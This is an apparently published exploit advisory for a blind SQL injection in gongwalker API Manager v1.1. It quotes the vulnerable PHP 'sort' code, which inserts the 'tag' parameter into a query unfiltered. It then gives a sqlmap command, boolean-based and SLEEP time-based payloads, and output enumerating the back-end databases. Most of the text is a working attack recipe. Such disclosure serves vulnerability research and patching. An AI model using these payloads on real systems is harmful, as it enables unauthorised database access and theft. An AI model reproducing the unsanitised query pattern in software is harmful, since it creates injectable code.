Gongwalker API Manager 1.1 Blind SQL Injection
Posted on 11 May 2017
# Exploit Title: gongwalker API Manager v1.1 - Blind SQL Injection # Date: 2017-05-10 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: https://github.com/gongwalker/ApiManager # Software Link: https://github.com/gongwalker/ApiManager.git # Version: v1.1 # Tested on: Debian ### Vulnerable SQL Injection vulnerability exists in the execution of the sort function below. The value entered with the aid parameter is executed as SQL qeury without being filtered. - sort funcion in code- case 'sort': $sql = "select cname from cate where aid='{$_GET['tag']}' and isdel=0"; $menu = find($sql); $menu = ' - ' . "<a href='".U(array('act'=>'api','tag'=>$_GET['tag']))."'>{$menu['cname']}</a>"; $file ='./MinPHP/run/sort.php'; break; ### sqlmap command #> sqlm -u "http://127.0.0.1/vul_test/ApiManager/index.php?act=sort&tag=2" --level 4 --no-cast --dbs Parameter: tag (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: act=sort&tag=2' AND 5619=5619 AND 'Sknb'='Sknb Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: act=sort&tag=2' AND (SELECT * FROM (SELECT(SLEEP(5)))pkJT) AND 'tqrU'='tqrU --- [16:25:19] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.18 back-end DBMS: MySQL 5.0.12 ... available databases [7]: [*] gongwalker [*] information_schema [*] mysql [*] performance_schema [*] sys ....